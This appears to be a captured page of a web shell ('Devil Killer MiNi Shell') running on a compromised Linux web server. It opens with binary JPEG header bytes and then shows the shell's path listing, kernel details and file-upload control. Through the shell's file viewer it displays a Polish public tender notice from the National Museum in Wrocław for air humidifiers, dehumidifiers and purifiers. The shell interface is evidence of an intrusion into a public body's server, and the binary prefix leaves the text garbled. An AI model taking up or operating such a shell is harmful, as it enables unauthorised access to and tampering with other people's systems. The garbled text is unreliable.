JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250723/0034178601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa nawilżaczy, osuszaczy i oczyszczaczy powietrza do Muzeum Narodowego we Wrocławiu i jego oddziałów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM NARODOWE WE WROCŁAWIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 520813545</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Powstańców Warszawy 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-153</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">717265678</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mnwr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.mnwr.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa nawilżaczy, osuszaczy i oczyszczaczy powietrza do Muzeum Narodowego we Wrocławiu i jego oddziałów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15cd1619-27b3-4bc6-b366-07427df28868</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00341786</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00673445/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa nawilżaczy, osuszaczy i oczyszczaczy powietrza do Muzeum narodowego we Wrocławiu i oddziałów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mnwr.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mnwr.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korespondencja elektroniczna prowadzona jest w języku polskim i powinna być sporządzona, wysyłana i odbierana zgodnie z wymaganiami technicznymi i organizacyjnymi zawartymi w Rozporządzeniu w sprawie środków komunikacji elektronicznej.<br/>2. Zgłoszenie do postępowania wymaga zalogowania wykonawcy do Platformy na subdomenie Muzeum Narodowego we Wrocławiu<br/>- https://mnwr.ezamawiajacy.pl lub https://oneplace.marketplanet.pl. Założenie konta i korzystanie z Platformy jest bezpłatne i<br/>wymaga zaakceptowania przez Wykonawcę zasad korzystania z Platformy zakupowej. Informacje w zakresie wymagań<br/>technicznych i organizacyjnych związanych z wykorzystaniem Platformy znajdują się na stronie Platformy<br/>https://mnwr.ezamawiajacy.pl w zakładce „Baza wiedzy” (folder o nazwie: Wykonawcy-Instrukcja-Nowa Strefa Wykonawcy, opis:<br/>Instrukcja dla Wykonawców dla postępowań opublikowanych od 08.09.2023r.).<br/>3. Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „zarejestruj się”.<br/>4. Rejestracja konta następuje automatycznie poprzez:<br/>1) podpisanie się pod wnioskiem podpisem elektronicznym (kwalifikowanym, osobistym lub profilem zaufanym), lub<br/>2) kontakt z numerem telefonu podanym w potwierdzeniu, lub<br/>3) jeżeli użytkownik nie podpisze się na wniosku ani nie skontaktuje się telefonicznie. Konto zostanie aktywowane w ciągu<br/>maksymalnie 6 godzin roboczych.<br/>5. Po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu i przekazywania dokumentów.<br/>6. Przycisk „Zadaj pytanie” jest dostępny bez logowania do Platformy, Wykonawca nie musi być wcześniej zarejestrowany, aby<br/>złożyć pytanie i zapoznać się z odpowiedzią.<br/>7. Niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>4) Włączona obsługa JavaScript;<br/>5) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>8. Dopuszczalne formaty przesyłanych danych to pliki o wielkości do 2 GB w txt, rtf, pdf, xps, odt, ods,odp, doc, xls, ppt, docx, xlsx,<br/>pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml,<br/>css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc<br/>9. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym wskazaniem na .pdf (PDF). W celu<br/>ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów .zip lub .7Z . Z uwagi na obowiązujące<br/>przepisy prawa pliki złożone w formatach .rar .gif .bmp .numbrs .pages. zostaną uznane za złożone nieskutecznie.<br/>10. Oferta (wszystkie dokumenty tworzące ofertę) powinna być sporządzona w języku polskim i złożona pod rygorem nieważności w<br/>formie elektronicznej (dokument elektroniczny podpisany kwalifikowanym podpisem elektronicznym przez osobę/osoby upoważnione<br/>do reprezentacji Wykonawcy) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>11. Plik Oferty załączony przez Wykonawcę na Platformie i zapisany, widoczny jest na Platformie jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku oferty dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie<br/>terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 19 ust. 1 PZP w związku z art. art. 13 ust. 1-3 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z<br/>przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o ochronie danych), dalej „RODO”, Zamawiający informuje, że:<br/>1. administratorem Państwa danych osobowych jest Muzeum Narodowe we Wrocławiu z siedzibą przy pl. Powstańców Warszawy 5,<br/>50-153 Wrocław;<br/>2. administrator wyznaczył Inspektora Danych Osobowych, adres e-mail: e-mail: iodo@mnwr.pl ; tel. (+48 71) 726 56 77.<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem<br/>o udzielenie zamówienia publicznego, które jest prowadzone w trybie podstawowym;<br/>4. odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 74 Pzp;<br/>5. Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp przez okres 4 lat od dnia zakończenia postępowania o<br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy<br/>(art. 78 ust. 4 Pzp);<br/>6.obowiązek podania przez Państwa danych osobowych bezpośrednio dotyczących Państwa jest wymogiem określonym w<br/>przepisach ustawy prawo Zamówień publicznych, związanym z udziałem w niniejszym postępowaniu;<br/>7. w odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do<br/>postanowień art. 22 RODO;<br/>8. posiadają Państwo:<br/>1) zgodnie z art. 15 RODO - prawo dostępu do danych osobowych Państwa dotyczących (z zastrzeżeniem, że w sytuacji, gdy<br/>skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku, mogą Państwo zostać<br/>zobowiązani do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego albo sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>2) zgodnie z art. 16 RODO - prawo do sprostowania Państwa danych osobowych (z tym, że skorzystanie z prawa do sprostowania<br/>nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z PZP oraz nie może naruszać integralności protokołu z postępowania oraz załączników do niego);<br/>3) zgodnie z art. 18 RODO - prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2<br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie Państwa<br/>danych osobowych narusza przepisy RODO;<br/>9. nie przysługuje Państwu:<br/>1) zgodnie z art. 17 ust. 3 lit. b, d lub e RODO - prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) zgodnie z art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10. przysługuje Państwu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Państwa danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki<br/>2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Żądanie ograniczenia przetwarzania danych nie będzie realizowane do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu końcowego postępowania oraz jego załączników, o których mowa w dziale XI ustawy Prawo zamówień<br/>publicznych a także nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z PZP.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP/271/7/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa profesjonalnych osuszaczy i nawilżaczy powietrza dla Muzeum Narodowego we Wrocławiu i jego oddziałów:<br/>1)	15 szt. osuszaczy powietrza profesjonalnych przeznaczonych do powierzchni do 250 m2 z możliwością zdalnego sterowania przez radiowy czujnik wilgotności wspólnie z nawilżaczem Brune B 500 FUNK lub Brune B 260 FUNK. <br/>2)	6 szt. osuszaczy powietrza profesjonalnych przeznaczonych do powierzchni do 100 m2 z możliwością zdalnego sterowania przez radiowy czujnik wilgotności wspólnie z nawilżaczem Brune B 500 FUNK lub Brune B 260 FUNK.<br/>3)	3 szt. nawilżaczy powietrza profesjonalnych przeznaczonych do kubatury do 450 m3.<br/>Przedmiot zamówienia obejmuje dostawę urządzeń do Muzeum Narodowego we Wrocławiu, do miejsc wskazanych przez Zamawiającego, rozpakowanie i uruchomienie urządzeń oraz przeprowadzenia szkolenia. Wykonawca przeszkoli pracowników Zamawiającego (w liczbie nie większej niż 30 osób) w obsłudze i konserwacji urządzeń nawilżających i osuszających. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39717200-3 - Urządzenia klimatyzacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39721320-1 - Osuszacze powietrza</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">56 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena w kryterium „Cena&#34;- C będzie dokona na podstawie ceny brutto zaoferowanej w Ofercie (formularzu ofertowym) i przeliczona według następującego wzoru:<br/>Cx= (C najniższa / C badana) x 80% x 100<br/>gdzie:<br/>Cx - ilość punktów za cenę brutto oferty badanej<br/>Cnajniższa -najniższa zaoferowana cena w postępowaniu,<br/>C badana -cena ocenianej oferty<br/>Maksymalną ilość punktów w kryterium „Cena” tj. 80 punktów uzyska oferta z najniższą ceną brutto, pozostałe oferty otrzymają punkty obliczone przy zastosowaniu powyższego wzoru.<br/>2. Punkty w kryterium „Okres gwarancji”- [G] zostaną przydzielone w następujący sposób:<br/>Ocenie będzie podlegać okres gwarancji i rękojmi, który nie może być krótszy niż 24 miesięcy i nie dłuższy niż 36 miesięcy. Okres gwarancji 24 m-ce jest okresem podstawowym i obowiązkowym dla zamówienia na dostawę nawilżaczy. Okres rozszerzony będzie podlegał premiowaniu w następujący sposób:<br/>36 mc-y	20 pkt.<br/>30 m-cy	10 pkt.<br/>24 m-cy 0 pkt.<br/><br/>3. W ramach wskazanych i opisanych powyżej kryteriów, Wykonawca otrzyma końcową łączną ilość punktów wyliczoną w następujący sposób: <br/>SUMA [Px- końcowa liczba punktów oferty nr x]= [C]+[G],</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa profesjonalnych oczyszczaczy powietrza dla Muzeum Narodowego we Wrocławiu i jego oddziałów , obejmuje dostawę łącznie 38 szt. urządzeń, w tym:<br/>1)	30 szt. oczyszczaczy powietrza do powierzchni max. 65 m2.<br/>2)	8 szt. oczyszczaczy powietrza do powierzchni max. 80 m2 .<br/><br/>Przedmiot zamówienia obejmuje dostawę urządzeń do Muzeum Narodowego we Wrocławiu, do miejsc wskazanych przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42514200-4 - Elektrostatyczne urządzenia do oczyszczania powietrza i gazu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">28 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Ocena w kryterium „Cena&#34;- C będzie dokona na podstawie ceny brutto zaoferowanej w Ofercie (formularzu ofertowym) i przeliczona według następującego wzoru:<br/>Cx= (C najniższa / C badana) x 80% x 100<br/>gdzie:<br/>Cx - ilość punktów za cenę brutto oferty badanej<br/>Cnajniższa -najniższa zaoferowana cena w postępowaniu,<br/>C badana -cena ocenianej oferty<br/>Maksymalną ilość punktów w kryterium „Cena” tj. 80 punktów uzyska oferta z najniższą ceną brutto, pozostałe oferty otrzymają punkty obliczone przy zastosowaniu powyższego wzoru.<br/>2. Punkty w kryterium „Okres gwarancji”- [G] zostaną przydzielone w następujący sposób:<br/>Ocenie będzie podlegać okres gwarancji i rękojmi, który nie może być krótszy niż 24 miesięcy i nie dłuższy niż 36 miesięcy. Okres gwarancji 24 m-ce jest okresem podstawowym i obowiązkowym dla zamówienia na dostawę nawilżaczy. Okres rozszerzony będzie podlegał premiowaniu w następujący sposób:<br/>36 mc-y	20 pkt.<br/>30 m-cy	10 pkt.<br/>24 m-cy 0 pkt.<br/><br/>3. W ramach wskazanych i opisanych powyżej kryteriów, Wykonawca otrzyma końcową łączną ilość punktów wyliczoną w następujący sposób: <br/>SUMA [Px- końcowa liczba punktów oferty nr x]= [C]+[G],</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres Gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O 